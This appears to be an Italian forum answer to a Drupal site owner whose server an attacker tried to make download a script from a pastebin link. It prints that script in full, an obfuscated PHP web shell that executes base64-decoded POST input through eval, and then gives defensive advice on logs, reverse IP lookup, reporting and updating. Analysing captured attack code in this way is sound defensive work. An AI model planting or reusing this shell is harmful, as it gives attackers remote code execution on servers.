Sembra che l'utente malintenzionato tenti di scaricare lo script da questo sito Web (https://pastebin.com/raw/PeBdUg98) sul tuo server:
Questo è lo script (è sicuro per fare clic su questo link):
<?php
$st = 'return value';
$cap='bas'.'e6'.'4_d'.'ec'.'ode';
$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
if(isset($_POST['uf']) && isset($_POST['pr'])) {
$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
array_walk($arr, strval($_POST['pr']), '');
}
?>
E nella seconda chiamata (a questo script - è sicuro cliccare sul link) prova a eseguire una patch sulla tua drupal.
Non penso che possa farlo funzionare - ma puoi imitare quello che sta facendo su un sito web fittizio che girerai e vedrai se funziona davvero.
Puoi controllare i tuoi log di accesso e se tutte le chiamate provengono dallo stesso blocco IP e fare una ricerca IP inversa a prova a trovare più informazioni sull'attaccante, eventualmente segnalalo al suo ISP.
Anche se non si tratta di phishing, puoi anche provare e inviare un rapporto qui: link
Buon lavoro con l'ultima versione di Drupal - se hai installato i plug-in prova anche a rimanere sulla loro ultima versione.